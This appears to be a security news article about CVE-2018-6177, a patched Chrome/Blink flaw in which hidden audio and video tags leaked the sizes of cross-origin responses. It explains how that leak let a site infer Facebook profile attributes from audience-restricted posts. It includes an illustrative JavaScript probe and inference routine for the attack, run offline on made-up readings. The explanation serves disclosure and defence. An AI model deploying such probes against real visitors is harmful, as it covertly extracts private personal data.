Google's Chrome 68 release marks every site served over plain HTTP as 'Not Secure' in the address bar, a change intended to push the web toward HTTPS by default. The same release also patches several vulnerabilities that could expose users' private data.

Ron Masas, a security researcher at Imperva, found a browser flaw that lets an attacker pull private profile data held by services such as Facebook and Google from a visitor who does nothing more than open an attacker-controlled link. The vulnerability, tracked as CVE-2018-6177, abuses how the Blink rendering engine handles the HTML audio and video tags, so every Blink-based browser, Google Chrome included, was affected.

To demonstrate the bug, Masas used Facebook, which builds detailed profiles of its users, including demographics and location history, and lets page administrators restrict who sees a post by attributes such as age, location, gender and interests.

The attack turns that audience targeting into an oracle. The attacker publishes a series of posts, each restricted to one audience (for example, male users aged 26 who are interested in cybersecurity), then embeds requests for those posts in a site they control. Which posts load for a given visitor reveals which restrictions that visitor satisfies, regardless of the visitor's own privacy settings.

On its own this is not enough: the embedding site cannot normally tell which visitor was served which post, because the browser's same-origin policy, as relaxed only where CORS explicitly allows it, keeps a page from reading cross-origin responses. The vulnerability is a gap in that protection: the attacker does not read the post, but learns whether it loaded.

Masas showed that Chrome did not validate the content type of resources loaded through audio and video elements, so a hidden audio or video tag on a malicious site could be pointed at a Facebook post URL. The post would not play, but JavaScript on the attacker's page could still observe how much data the cross-origin response carried, and a full post page differs in size from the short response Facebook returns when the visitor is not in the post's audience. That size signal tells the attacker which posts were served to each visitor.
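The following is an added example, not code from the page or from Masas's write-up, modelling the size oracle described above. The post IDs, audience rules, calibration values and observed byte counts are constructed for illustration. The browser-only `probeWithMediaElement` function assumes the signal is obtained by counting the `progress` events a hidden `<audio>` element fires while fetching the cross-origin URL; the inference logic below it is pure and runs offline.

```javascript
// Attacker-side catalogue of probe posts. Each post was published with one
// audience restriction (constructed data; Facebook's real targeting fields
// are richer than this).
const PROBE_POSTS = [
  { id: "post-male",    audience: { gender: "male" } },
  { id: "post-female",  audience: { gender: "female" } },
  { id: "post-age-26",  audience: { age: 26 } },
  { id: "post-infosec", audience: { interest: "cybersecurity" } },
];

// Browser-only probe (assumed mechanism, never executed in this demo): load
// the cross-origin post URL in a hidden <audio> element and count how many
// `progress` events fire before the element gives up. The count grows with
// the response size even though the page can never read the response body.
function probeWithMediaElement(url) {
  return new Promise((resolve) => {
    const el = document.createElement("audio");
    let progressEvents = 0;
    el.addEventListener("progress", () => { progressEvents += 1; });
    const done = () => resolve(progressEvents);
    el.addEventListener("error", done);   // HTML is not valid media: error after download
    el.addEventListener("suspend", done); // browser stopped fetching
    el.style.display = "none";
    el.src = url;
    document.body.appendChild(el);
  });
}

// Turn a size signal into a visibility decision. The attacker calibrates
// by first probing a post that is public (known visible) and one whose
// audience is impossible for anyone (known hidden); anything closer to the
// visible reading than the hidden one is treated as served.
function isVisible(sizeSignal, calibration) {
  const midpoint = (calibration.hidden + calibration.visible) / 2;
  return sizeSignal > midpoint;
}

// Merge the audience rules of every post that loaded into a profile guess.
// Posts with no observation (probe failed or timed out) are skipped.
function inferProfile(posts, observations, calibration) {
  const profile = {};
  for (const post of posts) {
    const signal = observations[post.id];
    if (signal === undefined) continue;
    if (isVisible(signal, calibration)) Object.assign(profile, post.audience);
  }
  return profile;
}

// Offline demo with constructed readings (progress-event counts); no
// network and no DOM are touched.
const CALIBRATION = { hidden: 1, visible: 12 };
const SAMPLE_OBSERVATIONS = {
  "post-male": 11,
  "post-female": 1,
  "post-age-26": 13,
  "post-infosec": 12,
};

function demo() {
  return inferProfile(PROBE_POSTS, SAMPLE_OBSERVATIONS, CALIBRATION);
}

if (typeof document === "undefined") {
  console.log(JSON.stringify(demo()));
}
```

In a real deployment the probes run in parallel, one element per restricted post, so a single page view yields every attribute in the catalogue. The oracle depends only on authorised and unauthorised responses differing in size, which is why a browser-side fix that stops media elements from leaking that size was needed; the patch removes the signal, not the targeting feature.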

Because many restricted posts can be probed at once, a single visit to the malicious page is enough to harvest several attributes, and a site with steady traffic can collect this data at scale. The technique belongs to the same family as earlier cross-origin leaks that exposed sensitive data such as email and private messages.

Masas reported the issue to Google, which fixed it in Chrome 68. Users should update to the current Chrome release to be protected.

For site operators the lesson is broader than one CVE. In MITRE ATT&CK terms the scenario starts with Initial Access through a drive-by visit to an attacker-controlled page; what is stolen is profile data rather than credentials, so it is an information leak rather than credential access. Keeping browsers and other client software current closes this class of bug as fixes ship.
